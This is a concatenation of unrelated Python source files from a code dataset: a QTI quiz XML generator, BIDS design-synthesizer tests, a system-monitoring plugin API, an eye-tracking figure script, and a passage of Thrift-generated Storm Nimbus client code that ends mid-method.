resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
else:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'short_answer_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml))
varequal = []
for choice in question.choices:
varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'multiple_answers_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
varequal = []
for choice in question.choices:
if choice.correct:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}'))
else:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'numerical_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK)
if question.correct_feedback_raw is None:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK
else:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK
xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml,
num_exact=question.numerical_exact_html_xml,
num_max=question.numerical_max_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'essay_question':
xml.append(ITEM_RESPROCESSING_START)
xml.append(ITEM_RESPROCESSING_ESSAY)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'file_upload_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question',
'numerical_question', 'essay_question', 'file_upload_question'):
if question.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml))
if question.correct_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
for choice in question.choices:
if choice.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}',
feedback=choice.feedback_html_xml))
xml.append(END_ITEM)
xml.append(AFTER_ITEMS)
return ''.join(xml)
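# Usage sketch (editor's note, not part of the original module): assessment()
# above is the public entry point of this QTI writer. Given a text2qti Quiz
# object (constructed elsewhere in the package from the plain-text quiz
# source), it returns the complete assessment XML as a single string. The
# identifier and title values below are illustrative only:
#
#   xml = assessment(quiz=quiz,
#                    assessment_identifier='text2qti_assessment',
#                    title_xml='Sample Quiz')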
| 1.78125 | 2 |
tests/test_aggregate_stats_design.py | bids-standard/bids-statsmodels-design-synthesizer | 0 | 5507 | #!/usr/bin/env python
"""Tests for `bids_statsmodels_design_synthesizer` package."""
import pytest
import subprocess as sp
from pathlib import Path
SYNTHESIZER = "aggregate_stats_design.py"
from bids_statsmodels_design_synthesizer import aggregate_stats_design as synth_mod
# from bids_statsmodels_design_synthesizer import Path(SYNTHESIZER).stem as synth_mod
EXAMPLE_USER_ARGS = {
"OUTPUT_TSV": "aggregated_design.tsv",
"MODEL": "data/ds000003/models/model-001_smdl.json",
"EVENTS_TSV": "data/ds000003/sub-01/func/sub-01_task-rhymejudgment_events.tsv",
"DURATION": 320,
}
def test_cli_help():
with pytest.raises(sp.CalledProcessError):
output = sp.check_output([SYNTHESIZER, "-h"])
with pytest.raises(sp.CalledProcessError):
output = sp.check_output([SYNTHESIZER, "--non-existent"])
def test_design_aggregation_function():
synth_mod.main(EXAMPLE_USER_ARGS)
def test_minimal_cli_functionality():
"""
We roughly want to implement the equivalent of the following:
from bids.analysis import Analysis
from bids.layout import BIDSLayout
layout = BIDSLayout("data/ds000003")
analysis = Analysis(model="data/ds000003/models/model-001_smdl.json",layout=layout)
analysis.setup()
more specifically we want to reimplement this line
https://github.com/bids-standard/pybids/blob/b6cd0f6787230ce976a374fbd5fce650865752a3/bids/analysis/analysis.py#L282
"""
bids_dir = Path(__file__).parent / "data/ds000003"
model = "model-001_smdl.json"
    arg_list = " ".join([f"""--{k.lower().replace("_", "-")}={v}""" for k, v in EXAMPLE_USER_ARGS.items()])
cmd = f"{SYNTHESIZER} {arg_list}"
output = sp.check_output(cmd.split())
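# Editor's note (illustrative only): with EXAMPLE_USER_ARGS as defined above,
# the arg_list/cmd construction in test_minimal_cli_functionality expands to
# roughly the following shell command:
#
#   aggregate_stats_design.py --output-tsv=aggregated_design.tsv \
#     --model=data/ds000003/models/model-001_smdl.json \
#     --events-tsv=data/ds000003/sub-01/func/sub-01_task-rhymejudgment_events.tsv \
#     --duration=320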
@pytest.mark.xfail(reason="Container not setup for boutiques yet")
def test_minimal_cli_functionality_using_boutiques():
    """This might be nice to do. Boutiques sets /bin/sh as the entrypoint for the container, so this should be tweaked to have the conda env and the pip-installed package working correctly."""
boutiques_dir = Path(__file__).parent.parent / "boutiques"
cmd = f"""
bosh
exec
launch
{boutiques_dir}/bids-app-bids-statsmodels-design-synthesizer.json
{boutiques_dir}/invocation.json
"""
output = sp.check_output(cmd.split())
| 2.328125 | 2 |
skynet-agent/plugins/plugin_api.py | skynetera/skynet | 3 | 5508 | #!/usr/bin/env python
# coding: utf-8
__author__ = 'whoami'
"""
@version: 1.0
@author: whoami
@license: Apache License 2.0
@contact: <EMAIL>
@site: http://www.itweet.cn
@software: PyCharm Community Edition
@file: plugin_api.py
@time: 2015-11-28 1:52 PM
"""
from linux import cpu, disk, iostats, loadavg, memory, netstats, swap
def get_load_info():
return loadavg.monitor()
def get_cpu_status():
return cpu.monitor()
def get_memory_info():
return memory.monitor()
def get_swap_info():
return swap.monitor()
def get_disk_info():
return disk.monitor()
def get_network_info():
return netstats.monitor()
def get_iostats_info():
return iostats.monitor()
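# Editor's note: the helper below is an illustrative addition, not part of the
# original plugin API. It simply gathers every metric wrapper defined above
# into one report dict; the shape of each value is whatever the corresponding
# linux.* monitor module returns.
def get_all_info():
    return {
        'load': get_load_info(),
        'cpu': get_cpu_status(),
        'memory': get_memory_info(),
        'swap': get_swap_info(),
        'disk': get_disk_info(),
        'network': get_network_info(),
        'iostats': get_iostats_info(),
    }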
| 1.789063 | 2 |
code/figure_warp.py | jwcarr/drift | 2 | 5509 | import numpy as np
import eyekit
import algorithms
import core
data = eyekit.io.load(core.FIXATIONS / 'sample.json')
passages = eyekit.io.load(core.DATA / 'passages.json')
original_sequence = data['trial_5']['fixations']
fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int)
word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int)
start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int)
expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100]))
diagram = eyekit.vis.Image(1920, 1080)
diagram.draw_text_block(passages['1B'], mask_text=True)
diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6)
diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6)
_, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY)
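# dynamic_time_warping() returns two values; the first is ignored here and the
# second is the warping path: warping_path[i] is the list of word indices that
# fixation i is aligned to, so a fixation can map to one or more words.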
for fixation, mapped_words in zip(original_sequence, warping_path):
for word_i in mapped_words:
word_x, word_y = word_XY[word_i]
diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True)
fig = eyekit.vis.Figure()
fig.add_image(diagram)
fig.set_crop_margin(2)
fig.set_padding(vertical=2, horizontal=3, edge=1)
fig.set_enumeration(False)
fig.save(core.VISUALS / 'illustration_warp.pdf', width=83)
# fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
| 2.125 | 2 |
storm/Nimbus.py | krux/python-storm | 0 | 5510 |
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
pass
def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
pass
def killTopology(self, name):
"""
Parameters:
- name
"""
pass
def killTopologyWithOpts(self, name, options):
"""
Parameters:
- name
- options
"""
pass
def activate(self, name):
"""
Parameters:
- name
"""
pass
def deactivate(self, name):
"""
Parameters:
- name
"""
pass
def rebalance(self, name, options):
"""
Parameters:
- name
- options
"""
pass
def beginFileUpload(self, ):
pass
def uploadChunk(self, location, chunk):
"""
Parameters:
- location
- chunk
"""
pass
def finishFileUpload(self, location):
"""
Parameters:
- location
"""
pass
def beginFileDownload(self, file):
"""
Parameters:
- file
"""
pass
def downloadChunk(self, id):
"""
Parameters:
- id
"""
pass
def getNimbusConf(self, ):
pass
def getClusterInfo(self, ):
pass
def getTopologyInfo(self, id):
"""
Parameters:
- id
"""
pass
def getTopologyConf(self, id):
"""
Parameters:
- id
"""
pass
def getTopology(self, id):
"""
Parameters:
- id
"""
pass
def getUserTopology(self, id):
"""
Parameters:
- id
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
self.send_submitTopology(name, uploadedJarLocation, jsonConf, topology)
self.recv_submitTopology()
def send_submitTopology(self, name, uploadedJarLocation, jsonConf, topology):
self._oprot.writeMessageBegin('submitTopology', TMessageType.CALL, self._seqid)
args = submitTopology_args()
args.name = name
args.uploadedJarLocation = uploadedJarLocation
args.jsonConf = jsonConf
args.topology = topology
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_submitTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = submitTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
"""
Parameters:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
self.send_submitTopologyWithOpts(name, uploadedJarLocation, jsonConf, topology, options)
self.recv_submitTopologyWithOpts()
def send_submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options):
self._oprot.writeMessageBegin('submitTopologyWithOpts', TMessageType.CALL, self._seqid)
args = submitTopologyWithOpts_args()
args.name = name
args.uploadedJarLocation = uploadedJarLocation
args.jsonConf = jsonConf
args.topology = topology
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_submitTopologyWithOpts(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = submitTopologyWithOpts_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def killTopology(self, name):
"""
Parameters:
- name
"""
self.send_killTopology(name)
self.recv_killTopology()
def send_killTopology(self, name):
self._oprot.writeMessageBegin('killTopology', TMessageType.CALL, self._seqid)
args = killTopology_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_killTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = killTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def killTopologyWithOpts(self, name, options):
"""
Parameters:
- name
- options
"""
self.send_killTopologyWithOpts(name, options)
self.recv_killTopologyWithOpts()
def send_killTopologyWithOpts(self, name, options):
self._oprot.writeMessageBegin('killTopologyWithOpts', TMessageType.CALL, self._seqid)
args = killTopologyWithOpts_args()
args.name = name
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_killTopologyWithOpts(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = killTopologyWithOpts_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def activate(self, name):
"""
Parameters:
- name
"""
self.send_activate(name)
self.recv_activate()
def send_activate(self, name):
self._oprot.writeMessageBegin('activate', TMessageType.CALL, self._seqid)
args = activate_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_activate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = activate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def deactivate(self, name):
"""
Parameters:
- name
"""
self.send_deactivate(name)
self.recv_deactivate()
def send_deactivate(self, name):
self._oprot.writeMessageBegin('deactivate', TMessageType.CALL, self._seqid)
args = deactivate_args()
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deactivate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deactivate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
return
def rebalance(self, name, options):
"""
Parameters:
- name
- options
"""
self.send_rebalance(name, options)
self.recv_rebalance()
def send_rebalance(self, name, options):
self._oprot.writeMessageBegin('rebalance', TMessageType.CALL, self._seqid)
args = rebalance_args()
args.name = name
args.options = options
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_rebalance(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = rebalance_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e is not None:
raise result.e
if result.ite is not None:
raise result.ite
return
def beginFileUpload(self, ):
self.send_beginFileUpload()
return self.recv_beginFileUpload()
def send_beginFileUpload(self, ):
self._oprot.writeMessageBegin('beginFileUpload', TMessageType.CALL, self._seqid)
args = beginFileUpload_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginFileUpload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = beginFileUpload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileUpload failed: unknown result");
def uploadChunk(self, location, chunk):
"""
Parameters:
- location
- chunk
"""
self.send_uploadChunk(location, chunk)
self.recv_uploadChunk()
def send_uploadChunk(self, location, chunk):
self._oprot.writeMessageBegin('uploadChunk', TMessageType.CALL, self._seqid)
args = uploadChunk_args()
args.location = location
args.chunk = chunk
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_uploadChunk(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = uploadChunk_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def finishFileUpload(self, location):
"""
Parameters:
- location
"""
self.send_finishFileUpload(location)
self.recv_finishFileUpload()
def send_finishFileUpload(self, location):
self._oprot.writeMessageBegin('finishFileUpload', TMessageType.CALL, self._seqid)
args = finishFileUpload_args()
args.location = location
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_finishFileUpload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = finishFileUpload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def beginFileDownload(self, file):
"""
Parameters:
- file
"""
self.send_beginFileDownload(file)
return self.recv_beginFileDownload()
def send_beginFileDownload(self, file):
self._oprot.writeMessageBegin('beginFileDownload', TMessageType.CALL, self._seqid)
args = beginFileDownload_args()
args.file = file
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginFileDownload(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = beginFileDownload_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileDownload failed: unknown result");
def downloadChunk(self, id):
"""
Parameters:
- id
"""
self.send_downloadChunk(id)
return self.recv_downloadChunk()
def send_downloadChunk(self, id):
self._oprot.writeMessageBegin('downloadChunk', TMessageType.CALL, self._seqid)
args = downloadChunk_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_downloadChunk(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = downloadChunk_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "downloadChunk failed: unknown result");
def getNimbusConf(self, ):
self.send_getNimbusConf()
return self.recv_getNimbusConf()
def send_getNimbusConf(self, ):
self._oprot.writeMessageBegin('getNimbusConf', TMessageType.CALL, self._seqid)
args = getNimbusConf_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getNimbusConf(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getNimbusConf_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getNimbusConf failed: unknown result");
def getClusterInfo(self, ):
self.send_getClusterInfo()
return self.recv_getClusterInfo()
def send_getClusterInfo(self, ):
self._oprot.writeMessageBegin('getClusterInfo', TMessageType.CALL, self._seqid)
args = getClusterInfo_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getClusterInfo(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getClusterInfo_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getClusterInfo failed: unknown result");
def getTopologyInfo(self, id):
"""
Parameters:
- id
"""
self.send_getTopologyInfo(id)
return self.recv_getTopologyInfo()
def send_getTopologyInfo(self, id):
self._oprot.writeMessageBegin('getTopologyInfo', TMessageType.CALL, self._seqid)
args = getTopologyInfo_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopologyInfo(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopologyInfo_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyInfo failed: unknown result");
def getTopologyConf(self, id):
"""
Parameters:
- id
"""
self.send_getTopologyConf(id)
return self.recv_getTopologyConf()
def send_getTopologyConf(self, id):
self._oprot.writeMessageBegin('getTopologyConf', TMessageType.CALL, self._seqid)
args = getTopologyConf_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopologyConf(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopologyConf_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyConf failed: unknown result");
def getTopology(self, id):
"""
Parameters:
- id
"""
self.send_getTopology(id)
return self.recv_getTopology()
def send_getTopology(self, id):
self._oprot.writeMessageBegin('getTopology', TMessageType.CALL, self._seqid)
args = getTopology_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopology failed: unknown result");
def getUserTopology(self, id):
"""
Parameters:
- id
"""
self.send_getUserTopology(id)
return self.recv_getUserTopology()
def send_getUserTopology(self, id):
self._oprot.writeMessageBegin('getUserTopology', TMessageType.CALL, self._seqid)
args = getUserTopology_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getUserTopology(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getUserTopology_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "getUserTopology failed: unknown result");
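# Editor's note (illustrative sketch, not generated by Thrift): a Nimbus client
# is typically wired up with a socket transport and binary protocol, e.g.
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#
#   socket = TSocket.TSocket('nimbus-host', 6627)  # host/port are deployment-specific
#   transport = TTransport.TFramedTransport(socket)  # Storm's Nimbus usually expects framed transport
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Client(protocol)
#   transport.open()
#   cluster = client.getClusterInfo()
#   transport.close()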
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["submitTopology"] = Processor.process_submitTopology
self._processMap["submitTopologyWithOpts"] = Processor.process_submitTopologyWithOpts
self._processMap["killTopology"] = Processor.process_killTopology
self._processMap["killTopologyWithOpts"] = Processor.process_killTopologyWithOpts
self._processMap["activate"] = Processor.process_activate
self._processMap["deactivate"] = Processor.process_deactivate
self._processMap["rebalance"] = Processor.process_rebalance
self._processMap["beginFileUpload"] = Processor.process_beginFileUpload
self._processMap["uploadChunk"] = Processor.process_uploadChunk
self._processMap["finishFileUpload"] = Processor.process_finishFileUpload
self._processMap["beginFileDownload"] = Processor.process_beginFileDownload
self._processMap["downloadChunk"] = Processor.process_downloadChunk
self._processMap["getNimbusConf"] = Processor.process_getNimbusConf
self._processMap["getClusterInfo"] = Processor.process_getClusterInfo
self._processMap["getTopologyInfo"] = Processor.process_getTopologyInfo
self._processMap["getTopologyConf"] = Processor.process_getTopologyConf
self._processMap["getTopology"] = Processor.process_getTopology
self._processMap["getUserTopology"] = Processor.process_getUserTopology
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_submitTopology(self, seqid, iprot, oprot):
args = submitTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = submitTopology_result()
try:
self._handler.submitTopology(args.name, args.uploadedJarLocation, args.jsonConf, args.topology)
except AlreadyAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("submitTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_submitTopologyWithOpts(self, seqid, iprot, oprot):
args = submitTopologyWithOpts_args()
args.read(iprot)
iprot.readMessageEnd()
result = submitTopologyWithOpts_result()
try:
self._handler.submitTopologyWithOpts(args.name, args.uploadedJarLocation, args.jsonConf, args.topology, args.options)
except AlreadyAliveException as e:
result.e = e
except InvalidTopologyException as ite:
result.ite = ite
oprot.writeMessageBegin("submitTopologyWithOpts", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_killTopology(self, seqid, iprot, oprot):
args = killTopology_args()
args.read(iprot)
iprot.readMessageEnd()
result = killTopology_result()
try:
self._handler.killTopology(args.name)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("killTopology", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_killTopologyWithOpts(self, seqid, iprot, oprot):
args = killTopologyWithOpts_args()
args.read(iprot)
iprot.readMessageEnd()
result = killTopologyWithOpts_result()
try:
self._handler.killTopologyWithOpts(args.name, args.options)
except NotAliveException as e:
result.e = e
oprot.writeMessageBegin("killTopologyWithOpts", TMessageType.REPLY, seqid)
result.write(oprot)
